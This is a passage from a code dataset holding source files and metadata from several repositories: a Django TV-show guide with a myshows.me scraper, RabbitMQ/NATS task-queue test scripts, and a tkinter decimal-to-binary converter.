"text": "from django.urls import path\nfrom .views import MainPageView, MovieDetail, SearchView, RatingView\n\napp_name = 'shows'\n\nurlpatterns = [\n path('', MainPageView.as_view(), name='index'),\n path('<str:rating>/', RatingView.as_view(), name='rating'),\n path('details/<int:external_id>/', MovieDetail.as_view(), name='detail'),\n path('search', SearchView.as_view(), name='search'),\n]\n"
},
{
"alpha_fraction": 0.7204610705375671,
"alphanum_fraction": 0.7325648665428162,
"avg_line_length": 36.71739196777344,
"blob_id": "84ebd9ce72558d36fc6a753d5924205d367f1ed6",
"content_id": "eed14c3fc4b0883f6007d6eef35085ccc726b573",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 46,
"path": "/shows/models.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\n\nclass Movie(models.Model):\n\texternal_id = models.IntegerField(unique=True)\n\tfirst_title = models.CharField(max_length=200, blank=True, db_index=True)\n\tsecond_title = models.CharField(max_length=200, blank=True, db_index=True)\n\tdescription = models.TextField(max_length=1000, blank=True)\n\tstart_date = models.DateField(null=True, blank=True, editable=False)\n\tend_date = models.DateField(null=True, blank=True)\n\tcountry = models.CharField(max_length=100)\n\timdb = models.DecimalField(max_digits=5, decimal_places=3)\n\tkp = models.DecimalField(max_digits=5, decimal_places=3)\n\tposter = models.ImageField(upload_to='images/', blank=True)\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('shows:detail', args=[int(self.external_id)])\n\n\tdef get_average(self):\n\t\t\"\"\"\n\t\taverage rating score\n\t\t\"\"\"\n\t\treturn (self.imdb + self.kp) / 2\n\n\tdef __str__(self):\n\t\treturn \"{} :: {}\".format(self.first_title, self.second_title)\n\n\nclass Season(models.Model):\n\tmovie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name='seasons')\n\tnumber = models.IntegerField()\n\n\tdef __str__(self):\n\t\treturn \"Season №{} / {}\".format(self.number, self.movie.first_title)\n\n\nclass Episode(models.Model):\n\tmovie = models.ForeignKey(Movie, on_delete=models.CASCADE, related_name='episodes')\n\tseason = models.ForeignKey(Season, on_delete=models.CASCADE, related_name='episodes')\n\tnumber = models.IntegerField()\n\tname = models.CharField(max_length=200, blank=True)\n\tdate = models.DateField(editable=False, null=True, blank=True)\n\n\tdef __str__(self):\n\t\treturn \"Episode №{} / Season №{} / {}\".format(self.number, self.season.number, self.movie.first_title)\n"
},
{
"alpha_fraction": 0.6993464231491089,
"alphanum_fraction": 0.6993464231491089,
"avg_line_length": 18.25,
"blob_id": "950a898c49545acee08453a9e65faf275c76519c",
"content_id": "26e06c570359d61076778207d5cff1ee7e0e80b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 153,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/accounts/urls.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom .views import ProfileView\n\napp_name = 'profile'\n\nurlpatterns = [\n path('', ProfileView.as_view(), name='profile'),\n]"
},
{
"alpha_fraction": 0.7654417753219604,
"alphanum_fraction": 0.7654417753219604,
"avg_line_length": 35.57143020629883,
"blob_id": "a1bcf6edd77a799bcf2011a6212ab077fa2fff03",
"content_id": "8ec1f1f92d9ffea91d2c271510f19355d1bb11eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1279,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 35,
"path": "/accounts/models.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.auth import get_user_model\n\nfrom shows.models import Movie, Episode\n\nUser = get_user_model()\n\nclass UserProfile(User):\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE, related_name='profile')\n\tavatar = models.ImageField(upload_to='users_logo/', blank=True)\n\nclass Sub(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='subs')\n\tmovie = models.OneToOneField(Movie, on_delete=models.CASCADE, related_name='subs')\n\n\tdef __str__(self):\n\t\treturn \"{} :: {}\".format(self.movie.first_title, self.movie.second_title)\n\nclass SubEpisode(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name='viewed_episodes')\n\tsub = models.ForeignKey(Sub, on_delete=models.CASCADE, related_name='viewed_episodes')\n\tepisode = models.OneToOneField(Episode, on_delete=models.CASCADE)\n\tis_viewed = models.BooleanField(default=False)\n\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n\tif created:\n\t\tUserProfile.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n\tinstance.profile.save()"
},
{
"alpha_fraction": 0.5758365988731384,
"alphanum_fraction": 0.5799652338027954,
"avg_line_length": 32.84558868408203,
"blob_id": "030b17c9b767649241230931afd5874c8795f27b",
"content_id": "82aaa46eaaae65f7d75b166d15428813b914746c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4636,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 136,
"path": "/collector/collect.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from tempfile import NamedTemporaryFile\nfrom urllib.request import urlopen\n\nimport requests\nimport re\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\nfrom dateutil.parser import parse\nfrom django.core.files import File\n\nfrom shows.models import Movie, Season, Episode\n\nURL = 'https://myshows.me/'\n\n\ndef collect_data(external_id):\n url = URL + f'view/{external_id}/'\n page = requests.get(url)\n html = BeautifulSoup(page.text, \"html.parser\")\n return html\n\n\n\ndef collect_movie(external_id):\n try:\n m = Movie.objects.get(external_id=external_id)\n\n except Movie.DoesNotExist:\n\n m = Movie()\n html = collect_data(external_id)\n\n m.external_id = external_id\n try:\n m.first_title = html.find(\"h1\", itemprop='name').text.rstrip()\n except AttributeError:\n m.first_title = None\n\n try:\n m.second_title = html.find(\"p\", class_='subHeader').text.rstrip()\n except AttributeError:\n m.second_title = None\n\n info = html.find(class_='clear')\n\n dates = info.find(class_='flat').text.split(': ')[1].split(' – ')\n\n try:\n m.start_date = parse(dates[0])\n except ValueError:\n m.start_date = None\n\n\n try:\n m.end_date = parse(dates[1]) if dates[1] != '…' or '---' else None\n except ValueError:\n m.end_date = None\n\n clear_data = html.find(class_='clear')\n m.country = clear_data.find(string='Страна:').parent.parent.find('a').text or None\n try:\n m.imdb = clear_data.find(string='Рейтинг IMDB:').parent.parent.find(target='_blank').text\n except AttributeError:\n m.imdb = Decimal(0.0)\n try:\n m.kp = clear_data.find(string='Рейтинг Кинопоиска:').parent.parent.find(target='_blank').text\n except AttributeError:\n m.kp = Decimal(0.0)\n try:\n m.description = html.find(class_='col5').find_all('p')[0].text\n except (AttributeError, IndexError):\n m.description = ''\n\n raw_poster_html = html.find(class_='presentBlockImg')\n poster = re.search('(?<=\\().+?(?=\\))|$', str(raw_poster_html)).group()\n if poster:\n img_temp = NamedTemporaryFile(delete=True)\n img_temp.write(urlopen(poster).read())\n img_temp.flush()\n m.poster.save(f\"{external_id}.jpg\", File(img_temp), save=False)\n else:\n m.poster = None\n m.save()\n collect_seasons(m)\n\n collect_seasons(m)\n\n\ndef collect_seasons(movie_object):\n s = Season.objects.filter(movie_id=movie_object.id)\n s_values = s.values_list('number', flat=True)\n html = collect_data(movie_object.external_id)\n\n raw_seasons_data = html.find_all(itemprop='season')\n\n for season in raw_seasons_data:\n season_number = season.find(class_='flat').text.split(' ')[0]\n if not int(season_number) in s_values:\n Season.objects.create(number=season_number, movie_id=movie_object.id)\n\n raw_episodes_data = season.find_all(itemprop='episode')\n existing_episodes = s.get(number=season_number).episodes.all().values_list('number', flat=True)\n episode_number = 1\n for episode in reversed(raw_episodes_data):\n if not episode_number in existing_episodes:\n name = episode.find(itemprop='name').text\n try:\n date = parse(episode.find(itemprop='datePublished').text)\n except ValueError:\n date = None\n Episode.objects.create(number=episode_number,\n name=name,\n date=date,\n movie_id=movie_object.id,\n season_id=s.get(number=season_number).id)\n episode_number += 1\n\n\n\n# Collect data about all movies. 
It can takes for a long time, use it carefully\ndef full_data():\n main_page = requests.get(URL + 'search/all/')\n html = BeautifulSoup(main_page.text, \"html.parser\")\n\n pages_counter = html.find(class_='paginator').find_all('li')[-2].text\n for p_number in range(int(pages_counter) + 1):\n page = requests.get(URL + 'search/all/?page=' + str(p_number))\n page_html = BeautifulSoup(page.text, \"html.parser\")\n page_links = page_html.findAll('table')[1].findAll('tr')[1::]\n\n # collect all movies id on the page\n ids = re.findall('/(\\d+)/', str(page_links))\n\n for external_id in ids:\n collect_movie(external_id)"
},
{
"alpha_fraction": 0.6933584809303284,
"alphanum_fraction": 0.7070183753967285,
"avg_line_length": 27.30666732788086,
"blob_id": "0bd8b82bb06c2da5ff230c4049a4f72b45419adc",
"content_id": "a1e94f25c8459822085f691a616707192e0590ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2123,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 75,
"path": "/shows/views.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404\nfrom django.views.generic import ListView, DetailView\nfrom django.db.models import Q\nfrom django.contrib.postgres.search import SearchVector\n\nfrom .models import Movie\n\n\nclass BaseListView(ListView):\n\tmodel = Movie\n\tordering = ('-imdb',)\n\tpaginate_by = 9\n\ttemplate_name = 'shows/main_content.html'\n\tcontext_object_name = 'movies_list'\n\n\nclass MainPageView(BaseListView):\n\tallow_empty = False\n\n\tdef get_context_data(self, **kwargs):\n\t\t# add to context 10 random top rated movies for carousel\n\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tcontext['random_top_movies'] = Movie.objects.filter(imdb__gte=9).order_by('-kp')[:10]\n\t\treturn context\n\n\nclass RatingView(BaseListView):\n\n\tdef get_queryset(self):\n\t\trating = self.kwargs.get('rating', None)\n\t\tallowed_kwargs = ('top_250', 'top_imdb', 'top_kp')\n\n\t\tif not rating:\n\t\t\treturn super().get_queryset()\n\n\t\tif rating not in allowed_kwargs:\n\t\t\treturn None\n\t\telse:\n\t\t\tif rating == 'top_250':\n\t\t\t\t# get objects with the biggest average rating score\n\t\t\t\tunsorted_results = Movie.objects.filter(Q(imdb__gte=7) & Q(kp__gte=7))\n\t\t\t\treturn sorted(unsorted_results, key=lambda avg: avg.get_average(), reverse=True)[:250]\n\t\t\telif rating == 'top_imdb':\n\t\t\t\treturn Movie.objects.order_by('-imdb')[:100]\n\t\t\telif rating == 'top_kp':\n\t\t\t\treturn Movie.objects.order_by('-kp')[:100]\n\n\nclass SearchView(BaseListView):\n\tallow_empty = True\n\n\tdef get_queryset(self):\n\t\tvector = SearchVector('first_title', 'second_title')\n\t\treturn Movie.objects.annotate(search=vector).filter(search=self.request.GET.get('q'))\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\n\t\tsearch_params = self.request.GET.get('q', None)\n\t\tif search_params:\n\t\t\tcontext['q'] = f\"q={self.request.GET.get('q', None)}&\"\n\n\t\treturn context\n\n\nclass MovieDetail(DetailView):\n\tmodel = Movie\n\ttemplate_name = 'shows/item_content.html'\n\tcontext_object_name = 'movie'\n\tpk_url_kwarg = 'external_id'\n\n\tdef get_object(self, queryset=None):\n\t\tmovie = get_object_or_404(Movie.objects.select_related(), external_id=self.kwargs['external_id'])\n\t\treturn movie\n"
},
{
"alpha_fraction": 0.7801608443260193,
"alphanum_fraction": 0.7801608443260193,
"avg_line_length": 33,
"blob_id": "74a20814ad8cba0cbd985d085e28e2d5a63d1ed8",
"content_id": "5bf5707e88f83aaa0a622b603621bcb23b5f7c4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/accounts/views.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.urls import reverse_lazy\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import CreateView\n\nclass SignUpView(CreateView):\n # form_class = CustomUserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\nclass ProfileView(TemplateView):\n template_name = 'profile/user_profile.html'"
}
] | 7 |
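In the shows_guide views above, RatingView's 'top_250' branch pulls every matching Movie into Python and sorts by get_average(). The same (imdb + kp) / 2 ordering can usually be pushed into the database with an annotation, keeping the queryset lazy; a minimal sketch under the field names defined in shows/models.py (top_250_queryset is a hypothetical helper, not project code):

from django.db.models import DecimalField, ExpressionWrapper, F
from shows.models import Movie

def top_250_queryset():
    # annotate each row with the average of the two ratings and let the
    # database do the ordering instead of sorting a Python list
    avg = ExpressionWrapper((F('imdb') + F('kp')) / 2, output_field=DecimalField())
    return (Movie.objects.filter(imdb__gte=7, kp__gte=7)
            .annotate(avg_rating=avg)
            .order_by('-avg_rating')[:250])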
Gaslox/distributed_framework
|
https://github.com/Gaslox/distributed_framework
|
68631cfc1f0d43eb9c8a499504902dbe42fd1511
|
ac224d62949973f7dd644e46ac29d8406f148eae
|
efb49604e353483ab1b94afa9194b68fc6744e4e
|
refs/heads/master
| 2023-08-29T23:08:58.363318 | 2021-11-18T02:44:05 | 2021-11-18T02:44:05 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6949806809425354,
"alphanum_fraction": 0.739382266998291,
"avg_line_length": 31.4375,
"blob_id": "01edce6659811b69642b098b4dd2677b2c417f87",
"content_id": "9c7d4f7cee7ce4d511621fcb806625d9388524dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 714,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 16,
"path": "/test_frame/test_rabbitmq/test_rabbitmq_consume.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "import time\nimport random\nfrom function_scheduling_distributed_framework import task_deco,BrokerEnum\n\n@task_deco('test_rabbit_queue7',broker_kind=BrokerEnum.RABBITMQ_AMQPSTORM,qps=2,)\ndef test_fun(x):\n # time.sleep(2.9)\n # sleep时间随机从0.1毫秒到5秒任意徘徊,最小耗时和最大耗时差距达到了5万倍。\n # 传统的恒定并发数量的线程池对未知的耗时任务且波动达到了5万倍,持续100次每秒的精确控频无能为力,\n # 但此框架只要简单设置一个qps就自动达到了这个目的。\n random_sleep = random.randrange(1,50000) / 10000\n time.sleep(random_sleep)\n print(x,random_sleep)\n\nif __name__ == '__main__':\n test_fun.consume()"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5528846383094788,
"avg_line_length": 26.799999237060547,
"blob_id": "a37b290e23b19c890c85a72333fdbc082e640a2b",
"content_id": "2b5b36d504ced8967cd0055e88b7891bbc98a4a8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 434,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 15,
"path": "/test_frame/test_broker/test_publish.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "import time\n\nfrom test_frame.test_broker.test_consume import f\n\n# f.clear()\n# for i in range(1000000):\n# # time.sleep(0.2)\n# if i == 0:\n# print(time.strftime(\"%H:%M:%S\"), '发布第一条')\n# if i == 99999:\n# print(time.strftime(\"%H:%M:%S\"), '发布第100000条')\n# f.push(i, i * 2)\n\nif __name__ == '__main__':\n f.multi_process_pub_params_list([{'x':i,'y':2*i} for i in range(100000)],process_num=5)"
},
{
"alpha_fraction": 0.6093959808349609,
"alphanum_fraction": 0.6476510167121887,
"avg_line_length": 34.47618865966797,
"blob_id": "14865e4eab361b5c57e8dff32c6534053f102565",
"content_id": "49aa74e9ff8c69f1983f5082ea0b601fd31fedc6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 42,
"path": "/test_frame/test_broker/test_consume.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "# from auto_run_on_remote import run_current_script_on_remote\n# run_current_script_on_remote()\nimport json\nimport os\nimport time\nimport random\n# from distributed_frame_config import REDIS_HOST\nfrom function_scheduling_distributed_framework import task_deco, BrokerEnum, ConcurrentModeEnum\nfrom function_scheduling_distributed_framework.utils import RedisMixin\n\nprint(BrokerEnum)\nprint(BrokerEnum.REDIS)\nprint(BrokerEnum.NATS)\n\n# @task_deco('test_queue66', broker_kind=BrokerEnum.RABBITMQ_AMQPSTORM, qps=5, log_level=10, is_print_detail_exception=False, is_show_message_get_from_broker=False,\n# is_using_distributed_frequency_control=True)\n@task_deco('test_queue66c', qps=50,broker_kind=BrokerEnum.NATS,concurrent_num=100,log_level=10)\ndef f(x, y):\n # print(f'函数开始执行时间 {time.strftime(\"%H:%M:%S\")}')\n # time.sleep(10)\n # # if x %10 == 0:\n # # print(x)\n #\n # print(f''' pid:{os.getpid()}, {int(time.time())} 计算 {x} + {y} = {x + y}''')\n # # time.sleep(0.7)\n # # time.sleep(6)\n # print(x, y)\n return x + y\n\n\nif __name__ == '__main__':\n # pass\n # f.clear()\n # for i in range(10):\n # f.push(i, y=i * 2)\n # f.multi_process_pub_params_list([{'x':i,'y':i*3} for i in range(100000)],process_num=2)\n # r.lpush(json.dumps({'x':i,'y':i*2}))\n # f.consume()\n # f.fabric_deploy('192.168.114.137',22,'ydf','372148',sftp_log_level=10)\n f.multi_process_consume(2)\n # f.consume()\n # f.wait_for_possible_has_finish_all_tasks()\n"
}
] | 3 |
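The translated comments in test_rabbitmq_consume.py above describe holding a fixed QPS while task runtimes vary by a factor of about 50,000. The essential trick is to pace task starts rather than size a thread pool; a minimal standard-library sketch of that idea (run_at_qps is a hypothetical name, and this illustrates the concept, not the framework's actual rate controller):

import threading
import time

def run_at_qps(fn, args_list, qps):
    # Start one task every 1/qps seconds. Because only the *starts* are paced,
    # the achieved rate does not depend on how long each task runs.
    interval = 1.0 / qps
    next_start = time.time()
    for args in args_list:
        delay = next_start - time.time()
        if delay > 0:
            time.sleep(delay)
        threading.Thread(target=fn, args=args).start()
        next_start += interval

For example, run_at_qps(test_fun, [(i,) for i in range(200)], qps=2) would start two calls per second regardless of each call's random sleep.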
pouya-py/tkinter
|
https://github.com/pouya-py/tkinter
|
877ad370a0aa7c2660d52b6bceaffbedb1db9035
|
98163f6262a7a0875552448bfd7a5b8d18510af1
|
76dba54daf4dff1cedb12987288d12855881ae44
|
refs/heads/main
| 2023-09-04T06:45:44.435196 | 2021-09-05T09:24:03 | 2021-09-05T09:24:03 | 403,264,349 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5430412292480469,
"alphanum_fraction": 0.5644329786300659,
"avg_line_length": 27.063671112060547,
"blob_id": "f6e8f5be0da002845143825b82ad64194cc4f1e8",
"content_id": "efad7dc7005dd030dfe40572c25eede77a3f9c50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7760,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 267,
"path": "/main.py",
"repo_name": "pouya-py/tkinter",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport tkinter.ttk as ttk\r\nimport tkinter.font as font\r\n\r\n\r\ndef binary_fraction(num ,n):\r\n binary =[]\r\n temporary_num = num\r\n while num != 1.0 and n != 0:\r\n num = num * 2\r\n output2.insert(\"insert\",f\" {temporary_num} * 2 ={num}\\n\")\r\n\r\n if num == 1.0:\r\n binary.append(1)\r\n output2.insert(\"end\", \"take 1 and finish:\\n\")\r\n output2.insert(\"end\",binary)\r\n output2.insert(\"end\",\"\\n\")\r\n return binary\r\n\r\n if num < 1:\r\n binary.append(0)\r\n if n-1 == 0:\r\n output2.insert('insert','Done we got to your precision\\n')\r\n return binary\r\n output2.insert(\"insert\", f\"Take 0 then multiply ({num}) with 2\\n\")\r\n n -= 1\r\n temporary_num = num\r\n\r\n if num > 1:\r\n binary.append(1)\r\n num = str(num)\r\n num = float(\".\" + num.split(\".\")[1])\r\n temporary_num = num\r\n if n-1 == 0:\r\n output2.insert('insert','Done we got to your precision\\n')\r\n return binary\r\n output2.insert(\"insert\",f\"Take 1 then multiply fraction({num}) part with 2\\n\")\r\n n -= 1\r\n\r\n\r\n return binary\r\n\r\ndef Integral_part(number):\r\n binary = []\r\n if number == 0:\r\n binary.append(0)\r\n output2.insert(\"end\", binary)\r\n output2.insert(\"insert\", \"\\n\")\r\n output2.insert(\"insert\", \"================\\n\")\r\n return binary\r\n\r\n while number != 0:\r\n rem = int(number % 2)\r\n output2.insert(\"insert\",f\"{int(number)}/2 =>\")\r\n output2.insert(\"insert\",f\"remainder:{rem}\")\r\n output2.insert(\"insert\", \"\\n\")\r\n binary.append(rem)\r\n Quotient = number // 2\r\n output2.insert(\"insert\", f\"Quotient:{int(Quotient)}\\n\")\r\n number = Quotient\r\n\r\n if Quotient == 0:\r\n output2.insert(\"end\", \"now just writing remainder from bottom to top\\n\")\r\n binary.reverse()\r\n output2.insert(\"end\", binary)\r\n output2.insert(\"insert\", \"\\n\")\r\n output2.insert(\"insert\", \"================\\n\")\r\n\r\n return binary\r\n\r\n output1.insert(\"end\", binary)\r\n\r\ndef add_one(li):\r\n if li[-1] == 0:\r\n li[-1] = 1\r\n return li\r\n else:\r\n li[-1] = 0\r\n for i in range(2, len(li)+1):\r\n if li[-i] == 1:\r\n li[-i] = 0\r\n\r\n else:\r\n li[-i] = 1\r\n return li\r\n return [1] + li\r\n\r\ndef not_list(n):\r\n for i in range(0,len(n)):\r\n if n[i] == 0:\r\n n[i] = 1\r\n else:\r\n n[i] = 0\r\n return n\r\n\r\n\r\n\r\n\r\ndef main():\r\n #get user input\r\n number = entry1.get()\r\n n = entry2.get()\r\n try:\r\n number = float(number)\r\n # Show a message box if the users input was invalid\r\n except:\r\n clear_field()\r\n messagebox.askretrycancel('Error', \" Invalid Input,just numbers!\")\r\n\r\n\r\n #this is where the user input is integer\r\n if number - int(number) == 0.0 and number > 0 :\r\n binary = Integral_part(number)\r\n output1.insert(\"insert\",binary)\r\n\r\n if number == 0:\r\n binary = Integral_part(number)\r\n output1.insert(\"insert\", binary)\r\n\r\n #this is where the input is not integer\r\n if number - int(number) != 0.0 :\r\n\r\n if n != \"\":\r\n try:\r\n n = int(n)\r\n except:\r\n messagebox.askretrycancel('Error', \" Invalid Input,just numbers!\")\r\n return\r\n else:\r\n #default precision\r\n n = 10\r\n fpart = int(number)\r\n output2.insert(\"insert\" , f\" < Integral part = {fpart}>\\n \")\r\n string_num = str(number)\r\n separt = float(\".\" + string_num.split(\".\")[1])\r\n #binary of first part\r\n f_part = Integral_part(fpart)\r\n output2.insert(\"insert\", f\" <Fraction part = {separt}>\\n\")\r\n #binary of second part\r\n se_part = 
binary_fraction(separt,n)\r\n binary = f_part +[\".\"] + se_part\r\n output2.insert(\"end\" , f\"Now concatinate {f_part} + {se_part} =\\n\")\r\n output2.insert(\"insert\", binary)\r\n output1.insert(\"insert\", binary)\r\n\r\n if number < 0.0 :\r\n output2.insert(\"insert\",f\"First calculate Binary of {-(int(number))} : \\n\")\r\n binary_num = Integral_part(-number)\r\n output2.insert(\"end\", f\"\\nComplement_1 for {binary_num} ==>\")\r\n complement = not_list(binary_num)\r\n output2.insert(\"end\", complement)\r\n output2.insert(\"end\",f\"\\n\\ncomplement 2 = complement_1 + 1 ==>\")\r\n result = add_one(complement)\r\n output2.insert(\"end\",result)\r\n result = [1] + result\r\n output2.insert(\"end\",\"\\nresult:\")\r\n output2.insert(\"end\", \"\\n\")\r\n output2.insert(\"end\",result)\r\n\r\n output1.insert(\"end\", result)\r\n\r\n\r\n\r\n\r\n#Functions to exit the program\r\ndef exit_program():\r\n root.destroy()\r\n\r\n#Function to clear_fields\r\ndef clear_field():\r\n entry1.delete(0,\"end\")\r\n entry2.delete(0, \"end\")\r\n output2.delete(1.0,\"end\")\r\n output1.delete(1.0, \"end\")\r\n\r\n\r\nroot = tk.Tk()\r\nroot.geometry(\"1200x500\")\r\nroot.title(\"Decimal to Binary Converter\")\r\n#root.resizable(False, False)\r\n\r\n\r\n\r\nframe = tk.Frame(root)\r\nframe.pack(fill='none' ,side='top')\r\n\r\n\r\noutput1_frame = tk.Frame(root)\r\noutput1_frame.pack(side = 'left')\r\n\r\n\r\n\r\nmain_frame = tk.Frame(root)\r\nmain_frame.pack(fill='both' , expand=1,side='right')\r\n\r\nmy_canvas = tk.Canvas(main_frame)\r\nmy_canvas.pack(side='right',fill='both', expand = 1)\r\nsecond_frame = tk.Frame(my_canvas)\r\n\r\n#button frame\r\nbutton_frame =tk.Frame(root)\r\nbutton_frame.pack(side='bottom')\r\n\r\n\r\n\r\nlabel1 = tk.Label(frame,text = \"Type a number you want to convert :\")\r\nlabel1.pack(side='top',expand=1)\r\n\r\n#entry field\r\nentry1 = tk.Entry(frame)\r\nentry1.pack(side='top',expand=1)\r\n#entry label\r\nlabel_entry2 = tk.Label(frame , text =\"If it's float ,type a precision for floating point(default=10):\")\r\nlabel_entry2.pack(side='top')\r\n#entry field\r\nentry2 = tk.Entry(frame)\r\nentry2.pack(side= 'top')\r\n\r\nmyfont = font.Font(family='couriel',size='10',weight='bold')\r\n\r\n#button convert\r\nbutton_convert = tk.Button(frame,text=\"Convert\",command=main,bg='black',fg='white')\r\nbutton_convert.pack(side='bottom')\r\nbutton_convert['font'] = myfont\r\n\r\n\r\n#exit and clear button\r\nbtn_exit = tk.Button(button_frame,text = \"Exit\" , command=exit_program,bg='black',fg='red')\r\nbtn_exit.pack(side='right',fill='none')\r\nbtn_exit['font'] = myfont\r\nbtn_clear = tk.Button(button_frame,text=\"Clear\" ,command = clear_field,bg='black',fg='red')\r\nbtn_clear['font'] = myfont\r\nbtn_clear.pack(side='right',fill='none')\r\n\r\n#result label\r\nlabel2 = tk.Label(output1_frame , text =\"Result=> \")\r\nlabel2.pack(side='left')\r\n\r\n#result field\r\noutput1 = tk.Text(output1_frame,width = 50, height = 100)\r\noutput1.pack(side='right',expand=1,fill='both')\r\n\r\n\r\n\r\n\r\n\r\n#procedure field\r\nlabel3 = tk.Label(main_frame , text =\"Procedures ==>\")\r\nlabel3.pack(side='left',expand=1)\r\nmy_canvas.create_window((0,0), window=second_frame,anchor=\"nw\")\r\noutput2 = tk.Text(second_frame , width = 50 , height = 100)\r\noutput2.pack(fill='both',expand=1,side='right')\r\nscrollb = ttk.Scrollbar(main_frame, orient='vertical',command = my_canvas.yview)\r\noutput2.configure(yscrollcommand =scrollb.set)\r\nscrollb.pack(side='right',fill='y')\r\nscrollb1 = 
ttk.Scrollbar(main_frame, orient='horizontal',command = my_canvas.xview)\r\nscrollb1.pack(side='bottom',fill='y')\r\n\r\nmy_canvas.configure(yscrollcommand=scrollb.set)\r\nmy_canvas.configure(xscrollcommand=scrollb1.set)\r\noutput2.bind('<Configure>',lambda e: my_canvas.configure(scrollregion = my_canvas.bbox(\"all\")))\r\n\r\n\r\n\r\n\r\nroot.mainloop()\r\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 65,
"blob_id": "2d1b537f44e6bbc69d6bc9fb4d612b8a219ada50",
"content_id": "33975cd0a4ed71bda9fa33c00bcd86efb5b63bbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 4,
"path": "/README.md",
"repo_name": "pouya-py/tkinter",
"src_encoding": "UTF-8",
"text": "# tkinter\nDecimal to binary with tkinter \nIn this code snippet i created a tkinter application with GUI window to convert a decimal number into a binary number.\nAlso this window has two frames which are going to show the result and the process to get that result. \n"
}
] | 2 |
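The negative branch of `main()` in the converter above implements two's complement by inverting the bits of the magnitude (`not_list`) and adding one (`add_one`). A minimal sketch of that path without the GUI, using an illustrative value:

```python
# Two's-complement path from the converter above, stripped of the GUI.
def not_list(bits):
    # One's complement: flip every bit.
    return [1 - b for b in bits]

def add_one(bits):
    # Add 1 to a bit list (most significant bit first), carrying as needed.
    bits = bits[:]
    for i in range(len(bits) - 1, -1, -1):
        if bits[i] == 0:
            bits[i] = 1
            return bits
        bits[i] = 0
    return [1] + bits  # carry propagated past the MSB

magnitude = [1, 0, 1]                        # binary of 5
result = [1] + add_one(not_list(magnitude))  # leading 1 marks the sign, as above
print(result)                                # [1, 0, 1, 1], the app's output for -5
```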
francescofuggitti/LTLf2DFA
|
https://github.com/francescofuggitti/LTLf2DFA
|
4d049f2698e49bdf1711ebe9d6f7755f2e889c43
|
434ceb1fd4e6c58b6254c4c6cf0bf7fc228c9e89
|
8f90fceb324c2ecd69c07bfc5acf329da86cf307
|
refs/heads/master
| 2020-03-10T11:57:50.101988 | 2018-09-25T18:49:51 | 2018-09-25T18:49:51 | 129,366,709 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44104745984077454,
"alphanum_fraction": 0.4515875577926636,
"avg_line_length": 49.081966400146484,
"blob_id": "0879b4fe3031f76e1425351df9dcf901edfbf891",
"content_id": "35a3aa199a8a114a43cae7a05a716e6aa9bbcd43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15275,
"license_type": "permissive",
